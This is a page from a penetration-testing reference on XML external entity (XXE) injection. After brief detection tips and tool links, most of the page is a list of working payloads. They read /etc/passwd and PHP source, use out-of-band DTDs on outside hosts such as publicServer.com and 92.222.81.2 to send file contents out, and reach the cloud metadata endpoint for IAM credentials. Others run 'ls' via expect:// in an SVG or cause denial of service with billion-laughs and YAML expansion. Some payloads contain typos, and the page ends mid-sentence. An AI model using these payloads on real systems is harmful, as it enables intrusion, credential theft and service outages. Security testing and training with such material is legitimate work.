Pentest Book
Search…
XXE

Summary

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.
Detection:
1
# Content type "application/json" or "application/x-www-form-urlencoded" to "applcation/xml".
2
# File Uploads allows for docx/xlsx/pdf/zip, unzip the package and add your evil xml code into the xml files.
3
# If svg allowed in picture upload, you can inject xml in svgs.
4
# If the web app offers RSS feeds, add your milicious code into the RSS.
5
# Fuzz for /soap api, some applications still running soap apis
6
# If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML request/reponse
Copied!
Check:
1
<?xml version="1.0"?>
2
<!DOCTYPE a [<!ENTITY test "THIS IS A STRING!">]>
3
<methodCall><methodName>&test;</methodName></methodCall>
Copied!
If works, then:
1
<?xml version="1.0"?>
2
<!DOCTYPE a[<!ENTITY test SYSTEM "file:///etc/passwd">]>
3
<methodCall><methodName>&test;</methodName></methodCall>
Copied!

Tools

1
# https://github.com/BuffaloWill/oxml_xxe
2
# https://github.com/enjoiz/XXEinjector
Copied!

Attacks

1
# Get PHP file:
2
<?xml version="1.0"?>
3
<!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>
4
<methodCall><methodName>&test;</methodName></methodCall>
5
6
# Classic XXE Base64 encoded
7
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
8
9
# Check if entities are enabled
10
<!DOCTYPE replace [<!ENTITY test "pentest"> ]>
11
<root>
12
<xxe>&test;</xxe>
13
</root>
14
15
# XXE LFI:
16
<!DOCTYPE foo [
17
<!ELEMENT foo (#ANY)>
18
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
19
20
# XXE Blind LFI:
21
<!DOCTYPE foo [
22
<!ELEMENT foo (#ANY)>
23
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
24
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
25
26
# XXE Access control bypass
27
<!DOCTYPE foo [
28
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
29
<foo><result>&ac;</result></foo>
30
31
# XXE to SSRF:
32
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
33
34
# XXE OOB
35
<?xml version="1.0"?>
36
<!DOCTYPE data [
37
<!ENTITY % file SYSTEM "file:///etc/passwd">
38
<!ENTITY % dtd SYSTEM "http://your.host/remote.dtd">
39
%dtd;]>
40
<data>&send;</data>
41
42
# PHP Wrapper inside XXE
43
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
44
<contacts>
45
<contact>
46
<name>Jean &xxe; Dupont</name>
47
<phone>00 11 22 33 44</phone>
48
<adress>42 rue du CTF</adress>
49
<zipcode>75000</zipcode>
50
<city>Paris</city>
51
</contact>
52
</contacts>
53
54
<?xml version="1.0" encoding="ISO-8859-1"?>
55
<!DOCTYPE foo [
56
<!ELEMENT foo ANY >
57
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >
58
]>
59
<foo>&xxe;</foo>
60
61
# Deny Of Service - Billion Laugh Attack
62
63
<!DOCTYPE data [
64
<!ENTITY a0 "dos" >
65
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
66
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
67
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
68
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
69
]>
70
<data>&a4;</data>
71
72
# Yaml attack
73
74
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
75
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
76
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
77
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
78
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
79
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
80
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
81
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
82
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
83
84
# XXE OOB Attack (Yunusov, 2013)
85
86
<?xml version="1.0" encoding="utf-8"?>
87
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
88
<data>&send;</data>
89
90
File stored on http://publicServer.com/parameterEntity_oob.dtd
91
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
92
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
93
%all;
94
95
# XXE OOB with DTD and PHP filter
96
97
<?xml version="1.0" ?>
98
<!DOCTYPE r [
99
<!ELEMENT r ANY >
100
<!ENTITY % sp SYSTEM "http://92.222.81.2/dtd.xml">
101
%sp;
102
%param1;
103
]>
104
<r>&exfil;</r>
105
106
File stored on http://92.222.81.2/dtd.xml
107
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
108
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
109
110
# XXE Inside SOAP
111
112
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
113
114
# XXE PoC
115
116
<!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
117
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
118
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [<!ELEMENT foo ANY><!ENTITY xxe_test SYSTEM "file:///etc/passwd">]><foo>&xxe_test;</foo>
119
120
# XXE file upload SVG
121
<svg>&xxe;</svg>
122
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
123
<image xlink:href="expect://ls"></image>
124
</svg>
125
126
<?xml version="1.0" encdoing="UTF-8" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="14" x="0" y="16">&xxe;</text></svg>
127
128
# XXE Hidden Attack
129
130
- Xinclude
131
132
Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
133
Set the value of the productId parameter to:
134
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
135
136
- File uploads:
137
138
Create a local SVG image with the following content:
139
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
140
Post a comment on a blog post, and upload this image as an avatar.
141
When you view your comment, you should see the contents of the /etc/hostname file in your image. Then use the "Submit solution" but
Copied!

Mindmap

Last modified 4mo ago
Export as PDF
Copy link